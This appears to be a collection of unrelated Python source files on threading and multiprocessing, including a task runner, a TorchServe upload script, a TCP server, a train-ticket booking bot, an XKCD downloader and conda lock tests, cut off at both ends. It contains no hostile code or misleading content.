raise self._ParallelError("Keyboard Interrupted")
def _init_logger(self, task_name: str) -> None:
logging_folder = os.path.join(self._logging_folder, task_name)
os.makedirs(logging_folder, exist_ok=True)
logging_path = os.path.join(logging_folder, f"{timestamp()}.log")
self._setup_logger(task_name, logging_path)
def _refresh(self, skip_check_finished: bool) -> None:
if self._pid2task_idx is None:
self._pid2task_idx = self._resource_manager.pid2task_idx
if not self._resource_manager.inference_usages_initialized:
self._resource_manager.initialize_inference_usages()
if not self._resource_manager.checkpoint_initialized:
return
self._resource_manager.log_pid_usages_and_inference_frees()
self._resource_manager.check()
if not skip_check_finished:
self._wait_and_handle_finish(wait_until_finish=False)
def _wait_and_handle_finish(self, wait_until_finish: bool) -> None:
finished_slots = self.__wait(wait_until_finish)
if not finished_slots:
return
if self.terminated:
self._user_terminate()
finished_bundle = [[], []]
for finished_slot in finished_slots[::-1]:
if self._tqdm_bar is not None:
self._tqdm_bar.update()
tuple(
map(
list.append,
finished_bundle,
map(
list.pop,
[self._working_task_indices, self._working_processes],
[finished_slot] * 2,
),
)
)
for task_idx, process in zip(*finished_bundle):
task_name = self._resource_manager.handle_finish(task_idx, process)
if task_name is None:
continue
self.del_logger(task_name)
def _add_new_processes(self) -> bool:
n_working = len(self._working_processes)
n_new_jobs = self._num_jobs - n_working
n_res = len(self._all_task_indices) - self._cursor
if n_res > 0:
n_new_jobs = min(n_new_jobs, n_res)
for _ in range(n_new_jobs):
new_task_idx = self._all_task_indices[self._cursor]
self._working_processes.append(self._get_process(new_task_idx))
self._working_task_indices.append(new_task_idx)
self._cursor += 1
return True
return n_working > 0
def _user_terminate(self) -> None:
self._log_meta_msg(
"`_user_terminate` method hit, joining processes",
logging.ERROR,
)
for process in self._working_processes:
if process is None:
continue
process.join()
self._log_meta_msg(
"processes joined, raising self._ParallelError",
logging.ERROR,
)
recorded_exceptions = self.exceptions
if not recorded_exceptions:
raise self._ParallelError("Parallel terminated by user action")
else:
raise self._ParallelError("Parallel terminated by unexpected errors")
def _set_terminate(self, **kwargs) -> None:
meta = self.meta
meta["terminated"] = True
self._rs["__meta__"] = meta
if not kwargs:
suffix = ""
else:
suffix = f" ({' ; '.join(f'{k}: {v}' for k, v in kwargs.items())})"
self._log_meta_msg(f"`_set_terminate` method hit{suffix}", logging.ERROR)
def _get_task_name(self, task_idx: int) -> Optional[str]:
if task_idx is None:
return
if self._task_names[task_idx] is None:
self._task_names[task_idx] = f"task_{task_idx}"
task_name = f"{self._task_names[task_idx]}{self.name_suffix}"
self._init_logger(task_name)
return task_name
def _f_wrapper(self, task_idx: int, cuda: int = None) -> Callable:
task_name = self._get_task_name(task_idx)
logger = self._loggers_[task_name]
def log_method(msg, msg_level=logging.INFO, frame=None):
if frame is None:
frame = inspect.currentframe().f_back
self.log_msg(logger, msg, msg_level, frame)
return logger
def _inner(*args):
if self.terminated:
return
try:
log_method("task started", logging.DEBUG)
kwargs = {}
f_wants_cuda = f_wants_log_method = False
f_signature = inspect.signature(self._func)
for name, param in f_signature.parameters.items():
if param.kind is inspect.Parameter.VAR_KEYWORD:
f_wants_cuda = f_wants_log_method = True
break
if name == "cuda":
f_wants_cuda = True
continue
if name == "log_method":
f_wants_log_method = True
continue
if not f_wants_cuda:
if self._use_cuda:
log_method(
"task function doesn't want cuda but cuda is used",
logging.WARNING,
)
else:
log_method("task function wants cuda")
kwargs["cuda"] = cuda
if not f_wants_log_method:
msg = "task function doesn't want log_method"
log_method(msg, logging.WARNING)
else:
log_method("task function wants log_method")
kwargs["log_method"] = log_method
self._rs[task_name] = rs = self._func(*args, **kwargs)
terminate = isinstance(rs, dict) and rs.get("terminate", False)
if not terminate:
log_method("task finished", logging.DEBUG)
except KeyboardInterrupt:
log_method("key board interrupted", logging.ERROR)
return
except Exception as err:
logger.exception(
f"exception occurred, {err}",
extra={"func_prefix": LoggingMixin._get_func_prefix(None)},
)
terminate = True
exceptions = self.exceptions
self._rs[task_name] = rs = err
exceptions[task_name] = rs
self._rs["__exceptions__"] = exceptions
if terminate:
self._set_terminate(scope="f_wrapper", task=task_name)
log_method("task terminated", logging.ERROR)
return _inner
def _get_process(
self,
task_idx: int,
start: bool = True,
) -> Optional[Union[Tuple[Process, Dict[str, Any]], Process]]:
rs = self._resource_manager.get_process(
task_idx,
lambda: self.__sleep(skip_check_finished=False),
start,
)
task_name = rs["__task_name__"]
if not rs["__create_process__"]:
return
if not self._use_cuda or "GPU" not in rs:
args = (task_idx,)
else:
args = (task_idx, rs["GPU"]["tgt_resource_id"])
target = self._f_wrapper(*args)
process = Process(
target=target, args=tuple(args[task_idx] for args in self._args_list)
)
self._log_with_meta(task_name, "process created")
if start:
process.start()
self._log_with_meta(task_name, "process started")
self._record_process(task_idx, process, rs)
return process
return process, rs
def _record_process(
self,
task_idx: int,
process: Optional[Process],
rs: Dict[str, Any],
) -> None:
if process is None:
return
self._resource_manager.record_process(task_idx, process, rs)
__all__ = ["Parallel"]
|
serve.py
|
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import argparse
import binascii
import os
import socket
import sys
import tempfile
import threading
from functools import partial
from getpass import getuser
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer
from typing import List
from urllib.parse import urlparse
import fsspec
import requests
TORCHSERVE_PARAMS = (
"model_name",
"handler",
"runtime",
"batch_size",
"max_batch_delay",
"initial_workers",
"synchronous",
"response_timeout",
)
def parse_args(argv: List[str]) -> argparse.Namespace:
parser = argparse.ArgumentParser(
description="uploads the provided model to torchserve",
)
parser.add_argument(
"--model_path",
type=str,
help="model to serve",
required=True,
)
parser.add_argument(
"--management_api",
type=str,
help="address of the management api. e.g. http://localhost:8081",
required=True,
)
parser.add_argument(
"--timeout",
type=int,
help="timeout for requests to management api",
default=60,
)
parser.add_argument(
"--dryrun",
action="store_true",
help=argparse.SUPPRESS,
)
parser.add_argument(
"--port",
type=int,
help="""port for the HTTP file server to listen on when torchserve is loading the model.
This must be accessible from the torchserve instance.""",
default=8222,
)
# arguments from https://pytorch.org/serve/management_api.html#register-a-model
for param in TORCHSERVE_PARAMS:
parser.add_argument(
f"--{param}",
type=str,
help=f"""torchserve parameter {param}.
See https://pytorch.org/serve/management_api.html#register-a-model""",
)
return parser.parse_args(argv)
def get_routable_ip_to(addr: str) -> str:
"""
get_routable_ip_to opens a dummy connection to the target HTTP URL and
returns the IP address used to connect to it.
"""
parsed = urlparse(addr)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((parsed.hostname, parsed.port or 80))
return s.getsockname()[0]
finally:
s.close()
def rand_id() -> str:
id = binascii.b2a_hex(os.urandom(8)).decode("utf-8")
return f"{getuser()}_{id}"
def main(argv: List[str]) -> None:
args = parse_args(argv)
if args.dryrun:
print("App serve started successfully")
return
with tempfile.TemporaryDirectory() as tmpdir:
model_name = args.model_name or "model"
model_file = f"{model_name}_{rand_id()}.mar"
model_path = os.path.join(tmpdir, model_file)
print(f"downloading model from {args.model_path} to {model_path}...")
fs, _, rpaths = fsspec.get_fs_token_paths(args.model_path)
assert len(rpaths) == 1, "must have single path"
fs.get(rpaths[0], model_path)
addr = ("", args.port)
print(f"starting HTTP server at {addr}...")
handler_class = partial(SimpleHTTPRequestHandler, directory=tmpdir)
server: ThreadingHTTPServer = ThreadingHTTPServer(addr, handler_class)
try:
def serve() -> None:
server.serve_forever()
t = threading.Thread(target=serve)
t.start()
ip_address = get_routable_ip_to(args.management_api)
model_url = f"http://{ip_address}:{server.server_port}/{model_file}"
print(f"serving file at {model_url}")
url = f"{args.management_api}/models"
print(f"POST {url}")
payload = {
"url": model_url,
}
for param in TORCHSERVE_PARAMS:
v = getattr(args, param)
if v is not None:
payload[param] = v
r = requests.post(url, params=payload, timeout=args.timeout)
print(r.text)
r.raise_for_status()
finally:
print("shutting down...")
server.shutdown()
if __name__ == "__main__":
main(sys.argv[1:])
|
infolog.py
|
import atexit
import json
from datetime import datetime
from threading import Thread
from urllib.request import Request, urlopen
_format = '%Y-%m-%d %H:%M:%S.%f'
_file = None
_run_name = None
_slack_url = None
def init(filename, run_name, slack_url=None):
global _file, _run_name, _slack_url
_close_logfile()
_file = open(filename, 'a')
_file.write('\n-----------------------------------------------------------------\n')
_file.write('Starting new {} training run\n'.format(run_name))
_file.write('-----------------------------------------------------------------\n')
_run_name = run_name
_slack_url = slack_url
def log(msg, end='\n', slack=False):
print(msg, end=end)
if _file is not None:
_file.write('[%s] %s\n' % (datetime.now().strftime(_format)[:-3], msg))
if slack and _slack_url is not None:
Thread(target=_send_slack, args=(msg,)).start()
def _close_logfile():
global _file
if _file is not None:
_file.close()
_file = None
def _send_slack(msg):
req = Request(_slack_url)
req.add_header('Content-Type', 'application/json')
urlopen(req, json.dumps({
'username': 'tacotron',
'icon_emoji': ':taco:',
'text': '*%s*: %s' % (_run_name, msg)
}).encode())
atexit.register(_close_logfile)
|
tcp-server.py
|
#!/usr/bin/env python
# coding: utf-8
import socket
import threading
bind_ip = '0.0.0.0'
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
# 最大连接数5
server.listen(5)
print('[*] Listening on %s:%d' % (bind_ip, bind_port))
# 线程函数
def handle_client(client_socket):
# 打印出接收到的数据
request = client_socket.recv(1024)
print('[*] Received: %s' % request)
# 返还一个数据包
client_socket.send('ACK!')
client_socket.close()
# 服务端主循环
while True:
client, addr = server.accept()
print('[*] Accepted connection from: %s:%d' % (addr[0], addr[1]))
# 创建一个线程处理客户端请求
client_handler = threading.Thread(target=handle_client, args=(client,))
client_handler.start()
|
select_ticket_info.py
|
# -*- coding=utf-8 -*-
import datetime
import random
import os
import socket
import sys
import threading
import time
import TickerConfig
import wrapcache
from agency.cdn_utils import CDNProxy, open_cdn_file
from config import urlConf, configCommon
from config.TicketEnmu import ticket
from config.configCommon import seat_conf_2, seat_conf
from config.getCookie import getDrvicesID
from init.login import GoLogin
from inter.AutoSubmitOrderRequest import autoSubmitOrderRequest
from inter.ChechFace import chechFace
from inter.CheckUser import checkUser
from inter.GetPassengerDTOs import getPassengerDTOs
from inter.LiftTicketInit import liftTicketInit
from inter.Query import query
from inter.SubmitOrderRequest import submitOrderRequest
from myException.PassengerUserException import PassengerUserException
from myException.UserPasswordException import UserPasswordException
from myException.ticketConfigException import ticketConfigException
from myException.ticketIsExitsException import ticketIsExitsException
from myException.ticketNumOutException import ticketNumOutException
from myUrllib.httpUtils import HTTPClient
class select:
"""
快速提交车票通道
"""
def __init__(self):
self.cdn_list = open_cdn_file("filter_cdn_list")
self.get_ticket_info()
self._station_seat = [seat_conf[x] for x in TickerConfig.SET_TYPE]
self.auto_code_type = TickerConfig.AUTO_CODE_TYPE
self.httpClint = HTTPClient(TickerConfig.IS_PROXY, self.cdn_list)
self.httpClint.cdn = self.cdn_list[random.randint(0, 4)]
self.urls = urlConf.urls
self.login = GoLogin(self, TickerConfig.IS_AUTO_CODE, self.auto_code_type)
self.cookies = ""
self.queryUrl = "leftTicket/queryO"
self.passengerTicketStrList = ""
self.passengerTicketStrByAfterLate = ""
self.oldPassengerStr = ""
self.set_type = ""
self.flag = True
@staticmethod
def get_ticket_info():
"""
获取配置信息
:return:
"""
print(u"*" * 50)
print(f"检查当前版本为: {TickerConfig.RE_VERSION}")
version = sys.version.split(" ")[0]
print(u"检查当前python版本为:{},目前版本只支持3.6以上".format(version))
if version < "3.6.0":
raise Exception
print(u"12306刷票小助手"
)
print(
f"当前配置:\n出发站:{TickerConfig.FROM_STATION}\n到达站:{TickerConfig.TO_STATION}\n车次: {','.join(TickerConfig.STATION_TRAINS) or '所有车次'}\n乘车日期:{','.join(TickerConfig.STATION_DATES)}\n坐席:{','.join(TickerConfig.SET_TYPE)}\n是否有票优先提交:{TickerConfig.IS_MORE_TICKET}\n乘车人:{TickerConfig.TICKET_PEOPLES}\n" \
f"刷新间隔: 随机(1-3S)\n僵尸票关小黑屋时长: {TickerConfig.TICKET_BLACK_LIST_TIME}\n下单接口: {TickerConfig.ORDER_TYPE}\n下单模式: {TickerConfig.ORDER_MODEL}\n预售踩点时间:{TickerConfig.OPEN_TIME}")
print(u"*" * 50)
def station_table(self, from_station, to_station):
"""
读取车站信息
:param station:
:return:
"""
path = os.path.join(os.path.dirname(__file__), '../station_name.txt')
try:
with open(path, encoding="utf-8") as result:
info = result.read().split('=')[1].strip("'").split('@')
except Exception:
with open(path) as result:
info = result.read().split('=')[1].strip("'").split('@')
del info[0]
station_name = {}
for i in range(0, len(info)):
n_info = info[i].split('|')
station_name[n_info[1]] = n_info[2]
try:
from_station = station_name[from_station.encode("utf8")]
to_station = station_name[to_station.encode("utf8")]
except KeyError:
from_station = station_name[from_station]
to_station = station_name[to_station]
return from_station, to_station
def call_login(self, auth=False):
"""
登录回调方法
:return:
"""
if auth:
return self.login.auth()
else:
configCommon.checkSleepTime(self) # 防止网上启动晚上到点休眠
self.login.go_login()
def main(self):
l = liftTicketInit(self)
l.reqLiftTicketInit()
getDrvicesID(self)
self.call_login()
check_user = checkUser(self)
t = threading.Thread(target=check_user.sendCheckUser)
t.setDaemon(True)
t.start()
from_station, to_station = self.station_table(TickerConfig.FROM_STATION, TickerConfig.TO_STATION)
num = 0
s = getPassengerDTOs(selectObj=self, ticket_peoples=TickerConfig.TICKET_PEOPLES)
passenger = s.sendGetPassengerDTOs()
wrapcache.set("user_info", passenger, timeout=9999999)
now = datetime.datetime.now()
if TickerConfig.ORDER_MODEL is 1:
print(f"预售还未开始,阻塞中,预售时间为{TickerConfig.OPEN_TIME}, 当前时间为: {now.strftime('%H:%M:%S')}")
sleep_time_s = 0.1
sleep_time_t = 0.3
# 测试了一下有微妙级的误差,应该不影响,测试结果:2019-01-02 22:30:00.004555,预售还是会受到前一次刷新的时间影响,暂时没想到好的解决方案
while now.strftime("%H:%M:%S") < TickerConfig.OPEN_TIME:
now = datetime.datetime.now()
time.sleep(0.0001)
print(f"预售开始,开启时间为: {now.strftime('%H:%M:%S')}")
else:
sleep_time_s = TickerConfig.MIN_TIME
sleep_time_t = TickerConfig.MAX_TIME
while 1:
try:
num += 1
now = datetime.datetime.now() # 感谢群里大佬提供整点代码
configCommon.checkSleepTime(self) # 晚上到点休眠
q = query(selectObj=self,
from_station=from_station,
to_station=to_station,
from_station_h=TickerConfig.FROM_STATION,
to_station_h=TickerConfig.TO_STATION,
_station_seat=self._station_seat,
station_trains=TickerConfig.STATION_TRAINS,
station_dates=TickerConfig.STATION_DATES,
ticke_peoples_num=len(TickerConfig.TICKET_PEOPLES),
)
queryResult = q.sendQuery()
# 查询接口
if queryResult.get("status"):
train_no = queryResult.get("train_no", "")
train_date = queryResult.get("train_date", "")
stationTrainCode = queryResult.get("stationTrainCode", "")
secretStr = queryResult.get("secretStr", "")
secretList = queryResult.get("secretList", "")
seat = queryResult.get("seat", "")
leftTicket = queryResult.get("leftTicket", "")
query_from_station_name = queryResult.get("query_from_station_name", "")
query_to_station_name = queryResult.get("query_to_station_name", "")
is_more_ticket_num = queryResult.get("is_more_ticket_num", len(TickerConfig.TICKET_PEOPLES))
if wrapcache.get(train_no):
print(ticket.QUEUE_WARNING_MSG.format(train_no))
else:
# 获取联系人
s = getPassengerDTOs(selectObj=self, ticket_peoples=TickerConfig.TICKET_PEOPLES,
set_type="" if isinstance(seat, list) else seat_conf_2[seat],
# 候补订单需要设置多个坐席
is_more_ticket_num=is_more_ticket_num)
getPassengerDTOsResult = s.getPassengerTicketStrListAndOldPassengerStr(secretStr, secretList)
if getPassengerDTOsResult.get("status", False):
self.passengerTicketStrList = getPassengerDTOsResult.get("passengerTicketStrList", "")
self.passengerTicketStrByAfterLate = getPassengerDTOsResult.get(
"passengerTicketStrByAfterLate", "")
self.oldPassengerStr = getPassengerDTOsResult.get("oldPassengerStr", "")
self.set_type = getPassengerDTOsResult.get("set_type", "")
# 提交订单
# 订单分为两种,一种为抢单,一种为候补订单
if secretStr: # 正常下单
if TickerConfig.ORDER_TYPE == 1: # 快速下单
a = autoSubmitOrderRequest(selectObj=self,
secretStr=secretStr,
train_date=train_date,
passengerTicketStr=self.passengerTicketStrList,
oldPassengerStr=self.oldPassengerStr,
train_no=train_no,
stationTrainCode=stationTrainCode,
leftTicket=leftTicket,
set_type=self.set_type,
query_from_station_name=query_from_station_name,
query_to_station_name=query_to_station_name,
)
a.sendAutoSubmitOrderRequest()
elif TickerConfig.ORDER_TYPE == 2: # 普通下单
sor = submitOrderRequest(self, secretStr, from_station, to_station, train_no,
self.set_type,
self.passengerTicketStrList, self.oldPassengerStr, train_date,
TickerConfig.TICKET_PEOPLES)
sor.sendSubmitOrderRequest()
elif secretList: # 候补订单
c = chechFace(self, secretList, train_no)
c.sendChechFace()
else:
random_time = round(random.uniform(sleep_time_s, sleep_time_t), 2)
nateMsg = ' 无候补机会' if TickerConfig.ORDER_TYPE == 2 else ""
print(f"正在第{num}次查询 停留时间:{random_time} 乘车日期: {','.join(TickerConfig.STATION_DATES)} 车次:{','.join(TickerConfig.STATION_TRAINS) or '所有车次'} 下单无票{nateMsg} 耗时:{(datetime.datetime.now() - now).microseconds / 1000} {queryResult.get('cdn')}")
time.sleep(random_time)
except PassengerUserException as e:
print(e)
break
except ticketConfigException as e:
print(e)
break
except ticketIsExitsException as e:
print(e)
break
except ticketNumOutException as e:
print(e)
break
except UserPasswordException as e:
print(e)
break
except ValueError as e:
if e == "No JSON object could be decoded":
print(u"12306接口无响应,正在重试")
else:
print(e)
except KeyError as e:
print(e)
except TypeError as e:
print(u"12306接口无响应,正在重试 {0}".format(e))
except socket.error as e:
print(e)
if __name__ == '__main__':
s = select()
cdn = s.station_table("长沙", "深圳")
|
VMes_IO.py
|
from spiderNest.preIntro import *
from MiddleKey.redis_IO import RedisClient
from config import SYS_AIRPORT_INFO_PATH, REDIS_KEY_NAME_BASE
import threading
path_ = SYS_AIRPORT_INFO_PATH
def save_login_info(VMess, class_):
"""
VMess入库
class_: ssr or v2ray
"""
# redis loaded
# RedisClient().add(key_name=REDIS_KEY_NAME_BASE.format(class_), value_of_link_attr=VMess)
threading.Thread(target=RedisClient().add, args=(REDIS_KEY_NAME_BASE.format(class_), VMess)).start()
# static data loaded
now = str(datetime.now()).split('.')[0]
with open(path_, 'a', encoding='utf-8', newline='') as f:
writer = csv.writer(f)
# 入库时间,Vmess,初始化状态:0
writer.writerow(['{}'.format(now), '{}'.format(VMess), class_, '0'])
def vmess_IO(class_):
"""
获取可用订阅链接并刷新存储池
class_: ssr ; v2ray
"""
def refresh_log(dataFlow):
with open(path_, 'w', encoding='utf-8', newline='') as f:
writer = csv.writer(f)
writer.writerows(dataFlow)
try:
with open(path_, 'r', encoding='utf-8') as f:
reader = csv.reader(f)
vm_q = [vm for vm in reader]
new_q = vm_q
for i, value in enumerate(reversed(vm_q)):
if value[-1] == '0' and value[-2] == class_:
vm = value[1]
new_q[-(i + 1)][-1] = '1'
break
refresh_log(new_q)
return vm
except UnboundLocalError:
return '无可用订阅连接'
def avi_num():
from datetime import datetime, timedelta
with open(path_, 'r', encoding='utf-8') as f:
reader = csv.reader(f)
vm_list = [i for i in reader]
# ['2020-08-06 04:27:59', 'link','class_', '1']
vm_q = [vm for vm in vm_list if vm[-1] == '0']
tag_items = ''
for vm in vm_list:
if vm[-1] == '0':
bei_ing_time = datetime.fromisoformat(vm[0]) + timedelta(hours=12)
tag_items += '\n【√可选】【{}】#{}'.format(bei_ing_time, vm[-2])
return tag_items
|
test_gevent_process.py
|
import time
from gevent import monkey
monkey.patch_all()
from multiprocessing import Process
print(6666)
def f(x):
print(x)
time.sleep(10000)
if __name__ == '__main__':
[Process(target=f, args=(2,)).start() for i in range(2)]
|
xkcd_download_multithread.py
|
#! python3
# Download every single XKCD comic - multithreaded version
import bs4, requests, os, threading, time
#url = 'http://xkcd.com'
os.makedirs('xkcd', exist_ok=True) # exist_ok prevents from exception if folder already exists
def download_xkcd(start, end):
for url_number in range(start, end):
res = requests.get('http://xkcd.com/' + str(url_number))
res.raise_for_status()
soup = bs4.BeautifulSoup(res.text, 'lxml')
check_image_link = soup.select('#comic img')
if not check_image_link:
print('Cannot find the image')
else:
image_link = check_image_link[0].get('src')
# downloading the image
print('Downloading image {0}...'.format(image_link))
#time.sleep(1)
# saving image in previously created folder
image_file = open(os.path.join('xkcd', os.path.basename(image_link)), 'wb')
for chunk in res.iter_content(100000):
image_file.write(chunk)
image_file.close()
download_threads = [] # keep all threads objects
for i in range(1, 100, 10): # creates 10 threads, 1000 - number of total images downloaded
download_thread = threading.Thread(target=download_xkcd, args=(i, i+9)) # creating thread object
download_threads.append(download_thread)
download_thread.start() # running download_thread function
for download_thread in download_threads:
download_thread.join() # Waiting until all threads are finished
print("Done")
|
threads.py
|
from abc import abstractmethod, ABCMeta
from threading import Event, Thread
class CustomThread(object):
__metaclass__ = ABCMeta
def __init__(self):
self._task = None
self._before_task = self.dummy_task
self._after_task = self.dummy_task
self._task_args = []
self._task_kwargs = {}
self.thread = None
@property
def task_args(self):
return self._task_args
@task_args.setter
def task_args(self, args):
self._task_args = args
@property
def task_kwargs(self):
return self._task_kwargs
@task_kwargs.setter
def task_kwargs(self, kwargs):
self._task_kwargs = kwargs
@property
def before_task(self):
"""
Called before infinite loop
"""
return self._before_task
@before_task.setter
def before_task(self, task):
self._before_task = task
@property
def after_task(self):
"""
Called after loop
"""
return self._after_task
@after_task.setter
def after_task(self, task):
self._after_task = task
def join(self):
self.thread.join()
@property
def task(self):
return self._task
@task.setter
def task(self, task):
self._task = task
@abstractmethod
def stop(self):
pass
@abstractmethod
def pause(self):
pass
@abstractmethod
def resume(self):
pass
@abstractmethod
def start(self):
pass
class InfiniteThread(CustomThread):
def __init__(self):
CustomThread.__init__(self)
self._pause = Event()
self.running = False
def start(self):
if (not self.running) and (self._task):
self.running = True
self._pause.set()
self.thread = Thread(target=self.loop)
self.thread.start()
def stop(self):
if self.running:
self.running = False
def pause(self):
self._pause.clear()
def resume(self):
self._pause.set()
def loop(self):
self._before_task()
while self.running:
self._pause.wait()
self._task(*self._task_args, **self._task_kwargs)
self._after_task()
def dummy_task(self):
pass
|
console.py
|
'''
Created on 15/09/2015
@author: david
'''
import time
from threading import Thread
class ConsoleLink(object):
'''
Emulates a link showing the output trough the console
'''
def __init__(self):
self._emulatedProcessingTime = 3
def setEmulatedProcessingTime(self, time):
self._emulatedProcessingTime = time
def getEmulatedProcessingTime(self):
return self._emulatedProcessingTime
def open(self):
print("ConsoleLink open.")
def send(self, message, callback=None):
print(str(message))
if callback != None:
Thread(target=self._receive, kwargs=dict(callback=callback)).start()
def _receive(self, callback):
time.sleep(self._emulatedProcessingTime)
callback(None)
def close(self):
print("ConsoleLink closed.")
|
test_lock.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2012 Anaconda, Inc
# SPDX-License-Identifier: BSD-3-Clause
import pytest
from conda.lock import DirectoryLock, FileLock, LockError
from os.path import basename, exists, isfile, join
def test_filelock_passes(tmpdir):
"""
Normal test on file lock
"""
package_name = "conda_file1"
tmpfile = join(tmpdir.strpath, package_name)
with FileLock(tmpfile) as lock:
path = basename(lock.lock_file_path)
assert tmpdir.join(path).exists() and tmpdir.join(path).isfile()
# lock should clean up after itself
assert not tmpdir.join(path).exists()
def test_filelock_locks(tmpdir):
"""
Test on file lock, multiple lock on same file
Lock error should raised
"""
package_name = "conda_file_2"
tmpfile = join(tmpdir.strpath, package_name)
with FileLock(tmpfile) as lock1:
path = basename(lock1.lock_file_path)
assert tmpdir.join(path).exists()
with pytest.raises(LockError) as execinfo:
with FileLock(tmpfile, retries=1) as lock2:
assert False # this should never happen
assert lock2.path_to_lock == lock1.path_to_lock
assert tmpdir.join(path).exists() and tmpdir.join(path).isfile()
# lock should clean up after itself
assert not tmpdir.join(path).exists()
def test_folder_locks(tmpdir):
"""
Test on Directory lock
"""
package_name = "dir_1"
tmpfile = join(tmpdir.strpath, package_name)
with DirectoryLock(tmpfile) as lock1:
assert exists(lock1.lock_file_path) and isfile(lock1.lock_file_path)
with pytest.raises(LockError) as execinfo:
with DirectoryLock(tmpfile, retries=1) as lock2:
assert False # this should never happen
assert exists(lock1.lock_file_path) and isfile(lock1.lock_file_path)
# lock should clean up after itself
assert not exists(lock1.lock_file_path)
def test_lock_thread(tmpdir):
"""
2 thread want to lock a file
One thread will have LockError Raised
"""
def lock_thread(tmpdir, file_path):
with FileLock(file_path) as lock1:
path = basename(lock1.lock_file_path)
assert tmpdir.join(path).exists() and tmpdir.join(path).isfile()
assert not tmpdir.join(path).exists()
from threading import Thread
package_name = "conda_file_3"
tmpfile = join(tmpdir.strpath, package_name)
t = Thread(target=lock_thread, args=(tmpdir, tmpfile))
with FileLock(tmpfile) as lock1:
t.start()
path = basename(lock1.lock_file_path)
assert tmpdir.join(path).exists() and tmpdir.join(path).isfile()
t.join()
# lock should clean up after itself
assert not tmpdir.join(path).exists()
def test_lock_retries(tmpdir):
"""
2 thread want to lock a same file
Lock has zero retries
One thread will have LockError raised
"""
def lock_thread_retries(tmpdir, file_path):
with pytest.raises(LockError) as execinfo:
with FileLock(file_path, retries=0):
assert False # should never enter here, since max_tries is 0
assert "LOCKERROR" in str(execinfo.value)
from threading import Thread
package_name = "conda_file_3"
tmpfile = join(tmpdir.strpath, package_name)
t = Thread(target=lock_thread_retries, args=(tmpdir, tmpfile))
with FileLock(tmpfile) as lock1:
t.start()
path = basename(lock1.lock_file_path)
assert tmpdir.join(path).exists() and tmpdir.join(path).isfile()
t.join()
# lock should clean up after itself
assert not tmpdir.join(path).exists()
def test_permission_file():
"""
Test when lock cannot be created due to permission
Make sure no exception raised
"""
from conda.auxlib.compat import Utf8NamedTemporaryFile
from conda.common.compat import text_type
with Utf8NamedTemporaryFile(mode='r') as f:
if not isinstance(f.name, text_type):
return
with FileLock(f.name) as lock:
path = basename(lock.lock_file_path)
assert not exists(join(f.name, path))
|
multiprocess_stress.py
|
import sys
import argparse
import socket
from socket import error as SocketError
from multiprocessing import Process, Queue
import requests
import json
import random
import time
import metrics
import select
from sys import stdout
from termcolor import colored
#Time Constants
NOW = 1404776380
ONE_YEAR_AGO = 1404776380 - 31557600
CONN_DELAY = 1
METRICS = metrics.metrics
class MetricPusher(object):
"""Stress-tests the specified storage engine by pushing as many randomly-
generated metrics as possible over telnet or HTTP API
"""
def __init__(self, engine, api, amount, threads, conns, remote, port):
self.amount = amount
self.api = api
self.engine = engine
self.threads = threads
self.conns = conns
self.remote = remote
self.port = port
self.suffix = "http_api_test"
self.open_files = []
# Check OS type
self.os = sys.platform
if self.os == 'linux2':
self.epoll = select.epoll()
elif self.os == 'darwin':
self.kq = select.kqueue()
self.metrics = METRICS
self.per_thread_count = self.amount / self.threads
self.max = 0
def print_status(self, numbers):
""" Print status line and percentage bar for each process """
sys.stdout.write('\033[2J\033[H')
total_count = 0
total_rate = 0
for process_num, tuple in numbers.items():
percent = (tuple[0] / float(self.per_thread_count))
bar = ('=' * int(percent * 30)).ljust(30)
count_msg = "Process %d: %7d/%d (%5d metrics/sec) [%s]%2d%%\n" % (process_num,
tuple[0],
self.per_thread_count,
tuple[1],
colored(bar, 'blue'),
percent*100)
stdout.write(count_msg)
total_count += tuple[0]
total_rate += tuple[1]
stdout.write(" Total: %7d/%d (%6d metrics/sec)\n" % (total_count, self.amount, total_rate))
if total_rate > self.max:
self.max = total_rate
stdout.flush()
def _setup(self):
"""
Open files
Create threads
Open sockets and register with epoll
Start threads and call _send on each thread
"""
status = Queue()
workers = []
numbers = {}
if self.api == "telnet":
# Threads
if self.os == 'linux2':
for thread_num in range(0, self.threads):
# Open sockets for this thread
open_sockets = {}
for num in range(0, self.conns):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_fileno = sock.fileno()
self.epoll.register(socket_fileno,
select.EPOLLOUT)
open_sockets[socket_fileno] = sock
print "Connecting to %s on port %s" % (self.remote,
self.port)
open_sockets[socket_fileno].connect((self.remote,
self.port))
# Start this process
print "Starting process #%s" % thread_num
p = Process(target=self._send, args=(open_sockets, thread_num, status))
p.start()
workers.append(p)
numbers[thread_num] = (0, 0)
while any(i.is_alive() for i in workers):
time.sleep(0.1)
while not status.empty():
process, s_count, s_rate = status.get()
numbers[process] = (s_count, s_rate)
self.print_status(numbers)
elif self.os == 'darwin':
for thread_num in range(0, self.threads):
# Open sockets for this thread
open_sockets = {}
for num in range(0, self.conns):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket_fileno = sock.fileno()
open_sockets[socket_fileno] = sock
print "Connecting to %s on port %s" % (self.remote,
self.port)
open_sockets[socket_fileno].connect((self.remote,
self.port))
# Start this process
print "Starting process #%s" % thread_num
p = Process(target=self._send, args=(open_sockets, thread_num, status))
p.start()
workers.append(p)
numbers[thread_num] = (0, 0)
while any(i.is_alive() for i in workers):
time.sleep(0.1)
while not status.empty():
process, s_count, s_rate = status.get()
numbers[process] = (s_count, s_rate)
self.print_status(numbers)
elif self.api == "http":
for num in range(0, self.threads):
# Start this process
print "Starting process #%s" % num
p = Process(target=self._send, args=(None, ))
p.start()
def _send(self, open_sockets, process, status):
"""Send over the open sockets"""
count = 0
last_time = time.time()
if self.os == 'darwin':
kq = select.kqueue()
ev = []
for sock in open_sockets:
ev.append(select.kevent(sock,
select.KQ_FILTER_WRITE,
select.KQ_EV_ONESHOT | select.KQ_EV_ADD | select.KQ_EV_ENABLE))
if self.api == "telnet":
try:
while True:
# Get our epoll events
if self.os == 'linux2':
events = self.epoll.poll(5)
for fileNum, event in events:
if fileNum in open_sockets:
count += 1
if count % 5000 == 0:
